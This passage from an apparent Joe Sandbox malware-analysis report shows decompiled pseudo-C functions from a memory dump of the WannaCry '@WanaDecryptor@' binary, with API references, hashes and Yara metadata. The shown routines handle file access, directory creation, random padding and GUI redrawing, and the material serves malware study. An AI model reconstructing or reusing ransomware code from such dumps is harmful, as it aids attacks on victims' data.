					 *_t45 = 0;
					_a12 = 0;
					if(_t47 == 1) {
						_t44 = _a4;
						_a12 = 0;
						goto L10;
					} else {
						if(_t47 != 2) {
							L11:
							_push(0x20);
							L00412CEC();
							_t46 = _t28;
							if(_t47 == 1 || _t47 == 2) {
								 *_t46 = 1;
								 *((char*)(_t46 + 0x10)) = _a12;
								 *(_t46 + 1) = _t38;
								 *(_t46 + 4) = _t44;
								 *((char*)(_t46 + 8)) = 0;
								 *(_t46 + 0xc) = 0;
								if(_t38 != 0) {
									 *(_t46 + 0xc) = SetFilePointer(_t44, 0, 0, 1);
								}
								 *_a16 = 0;
								return _t46;
							} else {
								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
								 *_t46 = 0;
								 *(_t46 + 1) = 1;
								 *((char*)(_t46 + 0x10)) = 0;
								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
								 *(_t46 + 0xc) = 0;
								 *_a16 = 0;
								return _t46;
							}
						} else {
							_t44 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
							if(_t44 != 0xffffffff) {
								_a12 = 1;
								L10:
								_t28 = SetFilePointer(_t44, 0, 0, 1);
								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
								goto L11;
							} else {
								 *_t45 = 0x200;
								return 0;
							}
						}
					}
				} else {
					 *_a16 = 0x10000;
					return 0;
				}
			}









                                  0x004108a2
                                  0x004108ab
                                  0x004108c8
                                  0x004108cc
                                  0x004108ce
                                  0x004108d3
                                  0x004108d9
                                  0x004108dd
                                  0x00410915
                                  0x00410919
                                  0x00000000
                                  0x004108df
                                  0x004108e2
                                  0x00410938
                                  0x00410938
                                  0x0041093a
                                  0x00410945
                                  0x00410947
                                  0x00410980
                                  0x00410985
                                  0x00410988
                                  0x0041098b
                                  0x0041098e
                                  0x00410992
                                  0x00410999
                                  0x004109a8
                                  0x004109a8
                                  0x004109b4
                                  0x004109bb
                                  0x0041094e
                                  0x00410956
                                  0x0041095d
                                  0x00410962
                                  0x00410965
                                  0x00410969
                                  0x0041096d
                                  0x00410970
                                  0x00410973
                                  0x0041097b
                                  0x0041097b
                                  0x004108e4
                                  0x00410901
                                  0x00410906
                                  0x00410920
                                  0x00410925
                                  0x0041092c
                                  0x00410935
                                  0x00000000
                                  0x00410908
                                  0x00410908
                                  0x00410914
                                  0x00410914
                                  0x00410906
                                  0x004108e2
                                  0x004108b7
                                  0x004108be
                                  0x004108c7
                                  0x004108c7

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
                                  • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Pointer$#823Create
                                  • String ID:
                                  • API String ID: 3407337251-0
                                  • Opcode ID: 60c44a9ea6338bdef0f7b00b9d617ba4f076ca8c1f1597f154903f254465afcb
                                  • Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
                                  • Opcode Fuzzy Hash: 60c44a9ea6338bdef0f7b00b9d617ba4f076ca8c1f1597f154903f254465afcb
                                  • Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412250 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E00412250(CHAR* _a4, void* _a8) {
				void _v260;
				char _v520;
				long _t16;
				void* _t17;
				void* _t29;
				CHAR* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				void* _t56;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				char* _t88;
				char* _t93;

				_t88 =  &_v520;
				_t32 = _a4;
				if(_t32 != 0) {
					_t16 = GetFileAttributesA(_t32);
					if(_t16 == 0xffffffff) {
						_t16 = CreateDirectoryA(_t32, 0);
					}
				}
				_t87 = _a8;
				_t34 =  *_t87;
				if(_t34 == 0) {
					L15:
					return _t16;
				} else {
					_t17 = _t87;
					_t56 = _t87;
					do {
						if(_t34 == 0x2f || _t34 == 0x5c) {
							_t17 = _t56;
						}
						_t34 =  *(_t56 + 1);
						_t56 = _t56 + 1;
					} while (_t34 != 0);
					if(_t17 != _t87) {
						_t86 = _t87;
						_t51 = _t17 - _t87;
						_t52 = _t51 >> 2;
						memcpy( &_v260, _t86, _t52 << 2);
						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
						_t93 =  &(_t88[0x18]);
						_t34 = 0;
						_t93[_t29 + 0x114] = 0;
						E00412250(_t32,  &_v260);
						_t88 =  &(_t93[8]);
					}
					_v520 = 0;
					if(_t32 != 0) {
						asm("repne scasb");
						_t46 =  !(_t34 | 0xffffffff);
						_t85 = _t32 - _t46;
						_t47 = _t46 >> 2;
						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
						_t88 =  &(_t88[0x18]);
						_t34 = 0;
					}
					asm("repne scasb");
					_t36 =  !(_t34 | 0xffffffff);
					_t83 = _t87 - _t36;
					_t33 = _t36;
					asm("repne scasb");
					_t39 = _t33 >> 2;
					memcpy( &_v520 - 1, _t83, _t39 << 2);
					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
					_t16 = GetFileAttributesA( &_v520);
					if(_t16 != 0xffffffff) {
						goto L15;
					} else {
						return CreateDirectoryA( &_v520, 0);
					}
				}
			}
























                                  0x00412250
                                  0x00412257
                                  0x00412261
                                  0x00412264
                                  0x0041226d
                                  0x00412272
                                  0x00412272
                                  0x0041226d
                                  0x00412278
                                  0x0041227f
                                  0x00412284
                                  0x0041235a
                                  0x0041235a
                                  0x0041228a
                                  0x0041228a
                                  0x0041228c
                                  0x0041228e
                                  0x00412291
                                  0x00412298
                                  0x00412298
                                  0x0041229a
                                  0x0041229d
                                  0x0041229e
                                  0x004122a6
                                  0x004122aa
                                  0x004122ac
                                  0x004122b7
                                  0x004122ba
                                  0x004122c1
                                  0x004122c1
                                  0x004122c1
                                  0x004122c3
                                  0x004122d4
                                  0x004122d9
                                  0x004122d9
                                  0x004122de
                                  0x004122e3
                                  0x004122f0
                                  0x004122f2
                                  0x004122f8
                                  0x004122fc
                                  0x00412306
                                  0x00412306
                                  0x00412306
                                  0x00412306
                                  0x00412313
                                  0x00412315
                                  0x00412319
                                  0x0041231b
                                  0x00412322
                                  0x00412327
                                  0x0041232a
                                  0x00412336
                                  0x00412338
                                  0x00412343
                                  0x00000000
                                  0x00412345
                                  0x00000000
                                  0x0041234c
                                  0x00412343

                                  APIs
                                  • GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00412338
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesCreateDirectoryFile
                                  • String ID:
                                  • API String ID: 3401506121-0
                                  • Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                  • Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
                                  • Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                  • Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406A00 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				void* _t15;
				signed int _t23;
				intOrPtr* _t33;
				void* _t34;

				_t23 = _a12;
				_t33 = _a4;
				_push(_t23);
				_push(_a8);
				_t34 = __ecx;
				_push(_t33);
				L00412D6A();
				if(_t23 > 6) {
					L12:
					return _t15;
				} else {
					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
						case 0:
							_push( *((intOrPtr*)(__ecx + 0x824)));
							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
							L00412D64();
							if(_t17 == 0x402) {
								L6:
								_push(0xe0e0);
								 *((intOrPtr*)( *_t33 + 0x38))();
							} else {
								L00412D64();
								if(_t17 == 0x3fe) {
									goto L6;
								} else {
									L00412D64();
									if(_t17 == 0x3fb) {
										goto L6;
									} else {
										_push(0xffffff);
										 *((intOrPtr*)( *_t33 + 0x38))();
									}
								}
							}
							_t35 =  *((intOrPtr*)(_t34 + 0x828));
							if(_t35 != 0) {
								goto L11;
							}
							return 0;
							goto L13;
						case 1:
							goto L12;
						case 2:
							_push( *((intOrPtr*)(__esi + 0x824)));
							__ecx = __edi;
							 *((intOrPtr*)( *__edi + 0x34))();
							if(__esi != 0) {
								L11:
								return  *((intOrPtr*)(_t35 + 4));
							}
							return 0;
							goto L13;
					}
				}
				L13:
			}







                                  0x00406a01
                                  0x00406a0c
                                  0x00406a10
                                  0x00406a11
                                  0x00406a12
                                  0x00406a14
                                  0x00406a15
                                  0x00406a1d
                                  0x00406ab7
                                  0x00406ab7
                                  0x00406a23
                                  0x00406a23
                                  0x00000000
                                  0x00406a32
                                  0x00406a35
                                  0x00406a3a
                                  0x00406a44
                                  0x00406a70
                                  0x00406a72
                                  0x00406a79
                                  0x00406a46
                                  0x00406a48
                                  0x00406a52
                                  0x00000000
                                  0x00406a54
                                  0x00406a56
                                  0x00406a60
                                  0x00000000
                                  0x00406a62
                                  0x00406a64
                                  0x00406a6b
                                  0x00406a6b
                                  0x00406a60
                                  0x00406a52
                                  0x00406a7c
                                  0x00406a84
                                  0x00000000
                                  0x00000000
                                  0x00406a8c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406a97
                                  0x00406a98
                                  0x00406a9a
                                  0x00406aa5
                                  0x00406ab0
                                  0x00000000
                                  0x00406ab0
                                  0x00406aad
                                  0x00000000
                                  0x00000000
                                  0x00406a23
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3089$#4476
                                  • String ID:
                                  • API String ID: 2870283385-0
                                  • Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                  • Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
                                  • Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                  • Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D0A0 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
				char _v500;
				signed int _t22;
				signed int _t27;
				intOrPtr* _t32;
				void* _t40;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t49;

				_t32 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t49 =  &_v500 + 8;
				_t22 = rand();
				asm("cdq");
				_t40 = 0;
				_t43 = _t22 % 0xc8 + 0x1f;
				if(_t43 <= 0) {
					L2:
					_t41 = _t49 + _t43 - 0x13;
					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
					_t44 = _t43 + 1;
					 *((char*)(_t49 + _t44 + 0x14)) = 0;
					_t45 = _t44 + 1;
					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
					_t46 = _t45 + 1;
					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
					if(_t27 >= 0) {
						E0040D5A0(_t32, _t41);
						return 0;
					} else {
						return _t27 | 0xffffffff;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					 *((char*)(_t49 + _t40 + 0xc)) = rand();
					_t40 = _t40 + 1;
				} while (_t40 < _t43);
				goto L2;
			}













                                  0x0040d0a9
                                  0x0040d0ab
                                  0x0040d0ad
                                  0x0040d0b3
                                  0x0040d0b8
                                  0x0040d0bb
                                  0x0040d0c0
                                  0x0040d0c6
                                  0x0040d0cc
                                  0x0040d0d1
                                  0x0040d0e1
                                  0x0040d0ef
                                  0x0040d0f3
                                  0x0040d0f7
                                  0x0040d0fb
                                  0x0040d100
                                  0x0040d101
                                  0x0040d105
                                  0x0040d110
                                  0x0040d124
                                  0x0040d129
                                  0x0040d13d
                                  0x0040d14d
                                  0x0040d12d
                                  0x0040d137
                                  0x0040d137
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d0d3
                                  0x0040d0d3
                                  0x0040d0d8
                                  0x0040d0dc
                                  0x0040d0dd
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: rand$srandtime
                                  • String ID:
                                  • API String ID: 1946231456-0
                                  • Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                  • Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
                                  • Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                  • Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405180 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00405180(void* __ecx, intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t19;
				void* _t26;

				_t19 = _a4;
				_t26 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x44));
				__imp___mbscmp(_t10, _t19);
				if(_t10 == 0) {
					return _t10;
				} else {
					_push(_t19);
					L00412DA0();
					 *((char*)(__ecx + 0x48)) = 1;
					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
						E00405800(__ecx, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
						E00405820(_t26, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
						return InvalidateRect( *(_t26 + 0x20), 0, 1);
					}
					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
				}
			}






                                  0x00405181
                                  0x00405186
                                  0x0040518a
                                  0x00405191
                                  0x0040519c
                                  0x004051fb
                                  0x0040519e
                                  0x0040519e
                                  0x004051a1
                                  0x004051a9
                                  0x004051af
                                  0x004051b5
                                  0x004051b5
                                  0x004051bf
                                  0x004051c5
                                  0x004051c5
                                  0x004051cf
                                  0x00000000
                                  0x004051f2
                                  0x004051e7
                                  0x004051e7

                                  APIs
                                  • _mbscmp.MSVCRT ref: 00405191
                                  • #860.MFC42(?), ref: 004051A1
                                  • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #860InvalidateRectRedrawWindow_mbscmp
                                  • String ID:
                                  • API String ID: 497622568-0
                                  • Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                  • Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
                                  • Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                  • Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412A00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E00412A00(intOrPtr* _a4) {
				intOrPtr _t8;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t14;
				intOrPtr _t16;
				void* _t18;

				_t14 = _a4;
				if(_t14 != 0) {
					if( *_t14 == 1) {
						_t2 = _t14 + 4; // 0x5d5e5f01
						_t16 =  *_t2;
						 *0x4220dc = E004127A0(_t16);
						if(_t16 != 0) {
							_t9 =  *((intOrPtr*)(_t16 + 0x138));
							if(_t9 != 0) {
								_push(_t9);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
							 *((intOrPtr*)(_t16 + 0x138)) = 0;
							if(_t10 != 0) {
								_push(_t10);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_push(_t16);
							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
							L00412C98();
							_t18 = _t18 + 4;
						}
						_push(_t14);
						L00412C98();
						_t8 =  *0x4220dc; // 0x0
						return _t8;
					} else {
						 *0x4220dc = 0x80000;
						return 0x80000;
					}
				} else {
					 *0x4220dc = 0x10000;
					return 0x10000;
				}
			}









                                  0x00412a01
                                  0x00412a07
                                  0x00412a18
                                  0x00412a27
                                  0x00412a27
                                  0x00412a33
                                  0x00412a38
                                  0x00412a3a
                                  0x00412a42
                                  0x00412a44
                                  0x00412a45
                                  0x00412a4a
                                  0x00412a4a
                                  0x00412a4d
                                  0x00412a53
                                  0x00412a5f
                                  0x00412a61
                                  0x00412a62
                                  0x00412a67
                                  0x00412a67
                                  0x00412a6a
                                  0x00412a6b
                                  0x00412a75
                                  0x00412a7a
                                  0x00412a7a
                                  0x00412a7d
                                  0x00412a7e
                                  0x00412a83
                                  0x00412a8d
                                  0x00412a1a
                                  0x00412a20
                                  0x00412a25
                                  0x00412a25
                                  0x00412a09
                                  0x00412a0f
                                  0x00412a14
                                  0x00412a14

                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7d7a2d2ee013bc337beabdbd42578881703ff57a30ad9c0a94d6315e8ea3cb2
                                  • Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
                                  • Opcode Fuzzy Hash: e7d7a2d2ee013bc337beabdbd42578881703ff57a30ad9c0a94d6315e8ea3cb2
                                  • Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404430 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00404430(intOrPtr __ecx, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t13;
				struct HICON__* _t16;
				struct HICON__* _t17;
				intOrPtr _t26;

				_t26 = __ecx;
				_t13 =  *((intOrPtr*)(__ecx + 0x59));
				if(_t13 != 0) {
					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
						E00404530(__ecx);
					}
					if(E004045E0(_t26,  &_a8) == 0) {
						_t16 =  *(_t26 + 0x60);
					} else {
						_t16 =  *(_t26 + 0x5c);
					}
					_t17 = SetCursor(_t16);
					L00412CBC();
					return _t17;
				} else {
					_v16 = 0x10;
					if(__ecx != 0) {
						_t13 =  *((intOrPtr*)(__ecx + 0x20));
						_v8 = _t13;
					} else {
						_v8 = __ecx;
					}
					_v12 = 2;
					__imp___TrackMouseEvent( &_v16);
					 *((char*)(_t26 + 0x59)) = 1;
					L00412CBC();
					return _t13;
				}
			}










                                  0x00404434
                                  0x00404436
                                  0x0040443b
                                  0x00404480
                                  0x00404484
                                  0x00404484
                                  0x00404497
                                  0x0040449e
                                  0x00404499
                                  0x00404499
                                  0x00404499
                                  0x004044a2
                                  0x004044aa
                                  0x004044b3
                                  0x0040443d
                                  0x0040443f
                                  0x00404447
                                  0x0040444f
                                  0x00404452
                                  0x00404449
                                  0x00404449
                                  0x00404449
                                  0x0040445a
                                  0x00404463
                                  0x0040446b
                                  0x0040446f
                                  0x00404478
                                  0x00404478

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379$CursorEventMouseTrack
                                  • String ID:
                                  • API String ID: 2186836335-0
                                  • Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                  • Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
                                  • Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                  • Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404CF0 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00404CF0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t13;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr _t27;

				_push(0xffffffff);
				_push(E0041384E);
				_t13 =  *[fs:0x0];
				_push(_t13);
				 *[fs:0x0] = _t27;
				_v20 = __ecx;
				_v4 = 0;
				_t21 = __ecx + 0x70;
				_v16 = _t21;
				 *_t21 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t21 = 0x415bec;
				_t22 = __ecx + 0x64;
				_v16 = _t22;
				 *_t22 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t22 = 0x415bec;
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t13;
			}











                                  0x00404cf0
                                  0x00404cf2
                                  0x00404cf7
                                  0x00404cfd
                                  0x00404cfe
                                  0x00404d0c
                                  0x00404d10
                                  0x00404d18
                                  0x00404d1b
                                  0x00404d1f
                                  0x00404d27
                                  0x00404d2c
                                  0x00404d31
                                  0x00404d37
                                  0x00404d3a
                                  0x00404d3e
                                  0x00404d46
                                  0x00404d4b
                                  0x00404d53
                                  0x00404d59
                                  0x00404d5e
                                  0x00404d65
                                  0x00404d6d
                                  0x00404d78
                                  0x00404d82

                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
                                  • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
                                  • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
